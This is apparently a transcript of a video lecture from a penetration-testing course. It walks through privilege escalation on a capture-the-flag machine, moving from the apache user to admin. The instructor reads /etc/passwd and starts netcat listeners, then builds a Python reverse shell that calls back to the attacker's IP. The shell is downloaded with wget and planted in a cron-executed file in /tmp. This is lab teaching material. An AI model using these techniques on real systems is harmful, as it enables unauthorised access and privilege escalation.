1
00:00:00,720 --> 00:00:07,440
Hi, within this lecture, we're going to see what we can do to escalate our privileges because we are

2
00:00:07,440 --> 00:00:14,190
currently in the server as user Apache and we're going to see what we can do to make our way up.

3
00:00:14,670 --> 00:00:19,980
So what I'm going to do, I'm going to, of course, cat /etc/passwd to start with.

4
00:00:20,340 --> 00:00:23,310
OK, and here we have the root, of course.

5
00:00:23,790 --> 00:00:27,230
And let's see what we can see over here.

6
00:00:27,240 --> 00:00:33,840
We have the Apache, which is where we are currently, and we have Epizyme.

7
00:00:33,840 --> 00:00:36,570
And we have various users over here.

8
00:00:36,570 --> 00:00:38,190
Like we have easy peasy.

9
00:00:38,430 --> 00:00:45,380
We have admin, we have free God and we have frisee itself.

10
00:00:45,870 --> 00:00:50,970
So I don't know, maybe we are going to see every one of those.

11
00:00:50,970 --> 00:00:57,260
Maybe we're going to just jump right into some of those and make our way up from there.

12
00:00:57,630 --> 00:01:02,940
So I'm going to cat /etc/issue to see if we get any kind of description over here.

13
00:01:03,390 --> 00:01:08,310
So nope, we just see the goal and the IP address over there.

14
00:01:09,060 --> 00:01:13,790
So let's see what else we can get over here.

15
00:01:14,160 --> 00:01:20,240
So I'm going to try to go into the users, OK?

16
00:01:20,730 --> 00:01:22,470
And let me see where we are.

17
00:01:22,470 --> 00:01:24,840
We are in the root right now.

18
00:01:24,840 --> 00:01:30,450
If we run ls -la, we can see the current folders and files that are available to us.

19
00:01:31,470 --> 00:01:33,390
Let's see if we can go to root.

20
00:01:33,600 --> 00:01:35,160
I'm going to cd root.

21
00:01:35,160 --> 00:01:37,140
Of course, we cannot do that.

22
00:01:37,480 --> 00:01:42,000
OK, maybe we can go to some other user's folder.

23
00:01:42,000 --> 00:01:44,610
Maybe we can find some kind of lead over there.

24
00:01:44,940 --> 00:01:46,320
So I'm going to go to home.

25
00:01:46,680 --> 00:01:51,660
And as you can see in the home, we have admin, easy peasy and foresty got.

26
00:01:52,020 --> 00:01:54,840
So I'm going to go into admin, OK?

27
00:01:54,870 --> 00:01:56,070
I cannot do that.

28
00:01:56,250 --> 00:01:58,200
I'm going to go into easy peasy.

29
00:01:58,590 --> 00:01:59,460
And here you go.

30
00:01:59,460 --> 00:02:00,510
We can't do that.

31
00:02:00,870 --> 00:02:08,340
And if we run ls, we have a lot of files and folders over here, apparently, OK, we have

32
00:02:08,340 --> 00:02:08,960
mkdir.

33
00:02:09,990 --> 00:02:13,790
Let me run ls -la and see it in a better way.

34
00:02:14,550 --> 00:02:22,980
So over here in the easy peasy, we have some kind of hidden files and folders over here, OK?

35
00:02:23,430 --> 00:02:28,800
And we have, I believe, some kind of binaries as well, like sh, more charm.

36
00:02:29,280 --> 00:02:39,600
And let's see, we have nano and yeah, we have notes.txt, which is good because we can read

37
00:02:39,600 --> 00:02:44,040
it, I believe. I'm looking for the permissions.

38
00:02:44,460 --> 00:02:48,150
I'm going to cat the notes.txt and here you go.

39
00:02:48,150 --> 00:02:52,680
It says, Yoaz, I made it possible for you to do some automated checks.

40
00:02:53,250 --> 00:03:01,500
I did only allow your access to /usr/bin system binaries, so we can run some binaries in the usr folder,

41
00:03:01,500 --> 00:03:02,220
which is good.

42
00:03:02,820 --> 00:03:10,280
I did, however, copy a few extra often needed commands to my home directory, which is sh, more,

43
00:03:10,380 --> 00:03:14,490
df, cat and copes crap and so many more.

44
00:03:14,730 --> 00:03:15,540
Great.

45
00:03:16,200 --> 00:03:23,130
Don't forget to specify the full path for each binary so we can actually use those binaries in order

46
00:03:23,130 --> 00:03:24,680
to create a reverse shell.

47
00:03:24,690 --> 00:03:31,860
I believe, and we have a big tip over here, he says that just put a file called Run This in the tmp,

48
00:03:32,100 --> 00:03:35,700
OK, each line with one command.

49
00:03:35,700 --> 00:03:38,590
So we have to specify our one-liner.

50
00:03:38,610 --> 00:03:46,110
Over here to run those binaries, as far as I understand, so we can run some binaries

51
00:03:46,110 --> 00:03:50,790
as admin user, but we have to create a file in order to do that.

52
00:03:51,270 --> 00:03:54,360
But we cannot cd into that folder.

53
00:03:54,360 --> 00:04:03,480
So I believe we're going to have to see what kind of things we have over there by running an ls -la or

54
00:04:03,480 --> 00:04:04,410
something like that.

55
00:04:04,410 --> 00:04:09,030
Let's see if we can check the notes.txt using this.

56
00:04:09,330 --> 00:04:11,010
Nope, we cannot do that.

57
00:04:11,010 --> 00:04:17,820
Even though they copied these binaries into the admin folder, we cannot directly reach it.

58
00:04:18,150 --> 00:04:20,700
We cannot directly execute them.

59
00:04:20,970 --> 00:04:29,100
So if we could have done that, then it would make our way easier because we can run some binary commands,

60
00:04:29,400 --> 00:04:33,660
but there is a way to do that.

61
00:04:33,660 --> 00:04:39,810
It says just put a file called Run This into tmp and each line

62
00:04:39,810 --> 00:04:44,550
should only include one command, then the output goes to the file

63
00:04:44,550 --> 00:04:49,840
cron result in the tmp and it should run every minute with my account privileges.

64
00:04:49,860 --> 00:04:52,620
So there is a cron job going on over here.

65
00:04:52,620 --> 00:04:59,940
Cron job, OK, and in that cron job it runs the Run This file every minute.

66
00:05:00,620 --> 00:05:08,270
And if we can specify a one-liner over there to run a binary in an escalated privilege mode,

67
00:05:08,540 --> 00:05:14,030
then we can get a reverse shell back to us, then we can be admin user.

68
00:05:14,180 --> 00:05:18,800
I don't know if it will lead us to the root, but most probably it will.

69
00:05:19,010 --> 00:05:25,960
And as administrator user, maybe we can actually go into the root by not doing so many things later

70
00:05:25,970 --> 00:05:26,360
on.

71
00:05:26,870 --> 00:05:27,400
Right.

72
00:05:27,770 --> 00:05:32,120
So I'm going to do exactly like instructed over here.

73
00:05:32,420 --> 00:05:39,740
First of all, I'm going to see what kind of binaries are under the /usr/bin to see if we can run Python,

74
00:05:39,750 --> 00:05:40,640
for example.

75
00:05:42,020 --> 00:05:44,150
Let me see if we can run Python.

76
00:05:44,660 --> 00:05:45,380
And here you go.

77
00:05:45,380 --> 00:05:51,340
I lost the shell and of course, in order to regain the shell, I'm going to run nc -nvlp

78
00:05:51,350 --> 00:05:52,970
1234 one more time.

79
00:05:53,360 --> 00:06:02,000
And I'm going to have to go into the Firefox and run this version one more time and let's see if we

80
00:06:02,000 --> 00:06:03,560
can get this over here.

81
00:06:03,560 --> 00:06:13,140
So 10 to 16 and CYO uploads shelled out PMG or that PMG.

82
00:06:13,580 --> 00:06:14,260
Here you go.

83
00:06:14,300 --> 00:06:15,410
I believe it works.

84
00:06:15,470 --> 00:06:15,850
Here you go.

85
00:06:15,870 --> 00:06:17,300
I have to do it one more time.

86
00:06:17,810 --> 00:06:18,530
So great.

87
00:06:18,650 --> 00:06:21,290
I don't know if we have the python or not.

88
00:06:21,710 --> 00:06:29,010
So I'm going to run ls and I'm going to go to the home folder one more time and into the easy peasy

89
00:06:29,900 --> 00:06:32,030
to see that note one more time.

90
00:06:32,240 --> 00:06:33,700
I'm going to run ls -la.

91
00:06:33,980 --> 00:06:34,790
Here you go.

92
00:06:35,150 --> 00:06:38,900
I'm going to cat the notes.txt and here we are.

93
00:06:39,230 --> 00:06:44,180
So far I tried to see if we have Python over here and I failed to do that.

94
00:06:44,180 --> 00:06:47,480
So we're going to have to take a different route over here.

95
00:06:48,080 --> 00:06:55,700
And first of all, I really need to see what kind of thing I should put into the Run

96
00:06:55,700 --> 00:06:56,480
This file.

97
00:06:56,690 --> 00:07:02,780
So I'm going to try ls -la into this user and see what kind of things we have over there,

98
00:07:03,230 --> 00:07:03,890
OK?

99
00:07:04,370 --> 00:07:11,700
And we're going to try and if we can have a python running over here, then we're going to try that.

100
00:07:12,260 --> 00:07:19,490
So what I'm going to do, I'm going to ls -la into the /usr/bin and see all the available binaries

101
00:07:19,580 --> 00:07:20,220
for me.

102
00:07:20,270 --> 00:07:21,920
So right away.

103
00:07:22,220 --> 00:07:26,500
/usr/bin, here you go.

104
00:07:26,540 --> 00:07:29,030
I believe we managed to see that.

105
00:07:29,030 --> 00:07:32,090
And we have a lot of things going on over here.

106
00:07:32,090 --> 00:07:36,140
As you can see, we have a lot of binaries inside of our server.

107
00:07:36,680 --> 00:07:42,170
And I think we should do grep because it will take some time to find it from here.

108
00:07:42,170 --> 00:07:50,780
So I'm going to say ls -la /usr/bin and I'm going to pipe this into grep and I'm going to

109
00:07:50,780 --> 00:07:54,350
grep the python and here we have the python.

110
00:07:54,530 --> 00:08:01,520
I believe we only have Python 2, but it's OK, right, because we have the reverse shell codes for

111
00:08:01,520 --> 00:08:03,980
Python 2 in pentestmonkey.

112
00:08:04,250 --> 00:08:06,050
We can leverage that.

113
00:08:06,380 --> 00:08:15,650
And if we can make this work, then I can just create a Run This file that uses the python and just

114
00:08:15,800 --> 00:08:18,610
executes this file, for example.

115
00:08:18,620 --> 00:08:26,030
OK, so I'm going to go for pentestmonkey one more time and I'm going to search for Python reverse

116
00:08:26,030 --> 00:08:28,340
shell cheat sheet like we have done before.

117
00:08:28,640 --> 00:08:30,560
I'm going to open pentestmonkey.

118
00:08:31,190 --> 00:08:36,980
And if you cannot go into pentestmonkey, by the way, you can just use what I'm using.

119
00:08:37,340 --> 00:08:39,440
You can just type the python commands.

120
00:08:39,920 --> 00:08:41,330
I believe you, right now.

121
00:08:41,330 --> 00:08:43,700
You see how this works.

122
00:08:43,730 --> 00:08:52,850
OK, so let's open a new tab and do this in the local and we can just do this under the free folder.

123
00:08:52,970 --> 00:08:58,640
I'm going to open nano pythonshell.py over here.

124
00:08:58,670 --> 00:09:01,340
OK, so I'm going to paste this thing in.

125
00:09:01,760 --> 00:09:07,400
And since this is a one-liner, we can just put this in there on this folder as well, but it won't

126
00:09:07,400 --> 00:09:11,020
know how to run the python from the user binaries.

127
00:09:11,020 --> 00:09:18,650
So what I'm going to do, I'm just going to turn this into a regular python code, as we have done

128
00:09:18,650 --> 00:09:19,300
before.

129
00:09:19,340 --> 00:09:27,110
OK, I'm going to import the libraries socket, subprocess and the operating system library, os, over here.

130
00:09:27,290 --> 00:09:31,490
So I'm going to define the socket as s.

131
00:09:31,490 --> 00:09:35,030
So this is how the socket works, as you might remember.

132
00:09:35,540 --> 00:09:38,720
And over here, I'm just going to give my own IP address.

133
00:09:38,960 --> 00:09:43,190
And we need to change the port here as well, because we have used the one, two, three, four.

134
00:09:43,310 --> 00:09:49,370
I'm going to make it 55555, but you can just use any port that you want that is not

135
00:09:49,370 --> 00:09:50,360
currently in use.

136
00:09:50,370 --> 00:09:58,400
OK, so I'm coming over here to delete the semicolons because we don't need them in the regular python

137
00:09:58,400 --> 00:09:58,940
code.

138
00:09:59,680 --> 00:10:00,710
And here you go.

139
00:10:00,970 --> 00:10:06,380
So it will give us some as a child and I'm going to delete those things as well.

140
00:10:06,580 --> 00:10:07,450
So here you go.

141
00:10:07,480 --> 00:10:08,950
Our Python code is ready.

142
00:10:08,950 --> 00:10:13,030
If you want, you can just pause this video and write it on your own.

143
00:10:13,030 --> 00:10:17,040
Make sure you write exactly like what you have seen over there.

144
00:10:17,620 --> 00:10:19,200
So let me get this.

145
00:10:19,210 --> 00:10:20,030
And here you go.

146
00:10:20,380 --> 00:10:31,600
So I'm going to take this and put it into my Web server over here, OK, in my /var/www/html folder.

147
00:10:31,600 --> 00:10:36,400
So var slash www slash html.

148
00:10:37,030 --> 00:10:38,730
So copy that thing.

149
00:10:38,740 --> 00:10:43,790
So I'm going to run my Apache server like we have done before.

150
00:10:44,170 --> 00:10:48,960
So I have a python shell up in my Apache server.

151
00:10:49,090 --> 00:10:54,460
So what I'm going to do, I'm going to just use wget over here and as you can see we have the wget.

152
00:10:54,820 --> 00:11:02,240
So I'm going to go into the tmp because that's where we should actually execute this, as you can see

153
00:11:02,240 --> 00:11:02,890
in the tmp.

154
00:11:02,920 --> 00:11:08,350
We don't have anything right now, but we're going to have soon if I run this correctly.

155
00:11:08,620 --> 00:11:17,290
So wget http:// and write your own IP address over here in order to test this and just

156
00:11:17,290 --> 00:11:19,630
write the thing that you have just copied.

157
00:11:19,840 --> 00:11:20,970
And here you go.

158
00:11:21,010 --> 00:11:27,560
I managed to download the Python shell in my server, so I'm going to run cat on this.

159
00:11:27,850 --> 00:11:28,800
And here you go.

160
00:11:29,110 --> 00:11:30,700
We have the python shell.

161
00:11:31,090 --> 00:11:37,570
So rather than trying to run this python shell over here, we can actually run this by Dongzhou right

162
00:11:37,570 --> 00:11:37,870
now.

163
00:11:37,870 --> 00:11:45,580
But it will give us the shell, but it will give us the shell as the current user that we are in, as

164
00:11:45,580 --> 00:11:52,300
in I believe we are in the Apache user. In order to get this in a privileged way, in an escalated privileged

165
00:11:52,300 --> 00:12:00,520
way, we need to make this run with the cron job it was talking about so that it can run as admin

166
00:12:00,520 --> 00:12:00,960
user.

167
00:12:01,810 --> 00:12:05,560
So what we are going to do, we're going to do as instructed before.

168
00:12:05,590 --> 00:12:11,670
We're going to have to create a Run This file and in that Run This file, we have to specify something.

169
00:12:11,680 --> 00:12:17,630
So in order to do that, I'm going to just run echo and say /usr/bin/python.

170
00:12:17,680 --> 00:12:25,630
OK, so it's going to use the python over here under the /usr/bin folder and it's going to execute the

171
00:12:25,630 --> 00:12:30,310
/tmp/pythonshell.py and don't forget to place a space between them.

172
00:12:30,790 --> 00:12:34,540
And I'm going to put this into a file called Run This.

173
00:12:34,540 --> 00:12:39,520
And since we are currently in the tmp folder, we can just execute this over here.

174
00:12:39,910 --> 00:12:41,740
OK, I'm going to run this.

175
00:12:41,900 --> 00:12:44,170
It will be run within one minute.

176
00:12:44,170 --> 00:12:46,600
I believe, as you can see, if you run ls,

177
00:12:46,600 --> 00:12:52,690
we can see this. If you run cat Run This, it will just run this command and it also complies with the

178
00:12:52,690 --> 00:12:55,080
one line rule as well.

179
00:12:55,390 --> 00:12:59,470
So I'm going to say nc -nvlp 55555 over here.

180
00:12:59,800 --> 00:13:03,760
And within one minute it should get executed.

181
00:13:04,090 --> 00:13:06,550
OK, let me run it one more time.

182
00:13:06,730 --> 00:13:13,150
As you can see, this will create something called, I believe, cron result or something like that.

183
00:13:13,330 --> 00:13:20,950
And once we see that, it will mean that it gets executed in a regular way.

184
00:13:21,160 --> 00:13:24,400
Let's see how this thing was called.

185
00:13:24,400 --> 00:13:32,770
Let me come over here to top and see if we can get the note back and it will pass some time as well.

186
00:13:32,770 --> 00:13:33,550
Here you go.

187
00:13:33,880 --> 00:13:41,110
Yeah, it will just create a file called cron result, OK, in the tmp.

188
00:13:41,110 --> 00:13:44,890
So if you see the cron result, it means that it got executed.

189
00:13:45,610 --> 00:13:48,790
So this is not a rule in a regular server.

190
00:13:48,850 --> 00:13:51,790
This is the rule that the author of this CTF made possible.

191
00:13:51,790 --> 00:13:52,120
Right.

192
00:13:52,420 --> 00:13:54,220
So if I run ls, here you go.

193
00:13:54,250 --> 00:13:55,420
You see the cron result.

194
00:13:55,600 --> 00:13:57,250
Let me go back and here you go.

195
00:13:57,250 --> 00:13:59,200
We have the sh shell.

196
00:13:59,440 --> 00:14:01,060
So if you run whoami,

197
00:14:01,060 --> 00:14:03,040
we are admin right now.

198
00:14:03,430 --> 00:14:11,080
So we managed to become admin, but I believe we are not currently root, so we cannot go and be root

199
00:14:11,380 --> 00:14:12,220
directly.

200
00:14:12,400 --> 00:14:14,860
So let me cat the /etc/passwd over

201
00:14:14,860 --> 00:14:16,510
here. Here we are.

202
00:14:16,810 --> 00:14:19,000
We can see the root, we can see the admin.

203
00:14:19,150 --> 00:14:22,000
But there are a couple of other users here as well.

204
00:14:22,120 --> 00:14:27,760
So we might take a look at those ones as well in the upcoming lecture.